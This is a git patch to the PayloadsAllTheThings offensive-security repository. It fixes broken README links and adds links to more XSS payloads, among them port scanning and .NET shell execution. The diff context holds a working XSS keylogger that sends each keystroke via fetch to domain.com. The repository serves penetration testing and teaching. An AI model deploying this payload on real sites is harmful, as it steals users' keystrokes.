From e6b5dfa3dec176af5d3a40fbd34b5e45b28b4daf Mon Sep 17 00:00:00 2001 From: Swissky <swisskysec@protonmail.com> Date: Sun, 25 Mar 2018 23:51:22 +0200 Subject: [PATCH] Fix README broken links --- Methodology and Resources/Methodology_and_enumeration.md | 1 + README.md | 4 ++-- XSS injection/README.md | 9 +++++++++ 3 files changed, 12 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Methodology_and_enumeration.md b/Methodology and Resources/Methodology_and_enumeration.md index f25fa95..b7e09e3 100644 --- a/Methodology and Resources/Methodology_and_enumeration.md +++ b/Methodology and Resources/Methodology_and_enumeration.md @@ -1,4 +1,5 @@ # Bug Hunting Methodology and Enumeration +![exploitation](https://img.shields.io/badge/WIP-70%25-green.svg) ## Enumerate all subdomains (only if the scope is *.domain.ext) diff --git a/README.md b/README.md index 1b3cdce..4007411 100644 --- a/README.md +++ b/README.md @@ -9,8 +9,8 @@ All sections contain: - Some exploits You might also like : - - [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/) - - [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE Exploits) + - [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/) + - [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits) - Shellshock - HeartBleed - Apache Struts 2 diff --git a/XSS injection/README.md b/XSS injection/README.md index ada0e29..39897b3 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -31,6 +31,15 @@ Keylogger for XSS <img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'> ``` +More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all](http://www.xss-payloads.com/payloads-list.html?a#category=all): + - [Taking screenshots using XSS and the HTML5 Canvas](https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/) + - [JavaScript Port Scanner](http://www.gnucitizen.org/blog/javascript-port-scanner/) + - [Network Scanner](http://www.xss-payloads.com/payloads/scripts/websocketsnetworkscan.js.html) + - [.NET Shell execution](http://www.xss-payloads.com/payloads/scripts/dotnetexec.js.html) + - [Redirect Form](http://www.xss-payloads.com/payloads/scripts/redirectform.js.html) + - [Play Music](http://www.xss-payloads.com/payloads/scripts/playmusic.js.html) + + ## Identify an XSS endpoint ``` <script>debugger;</script>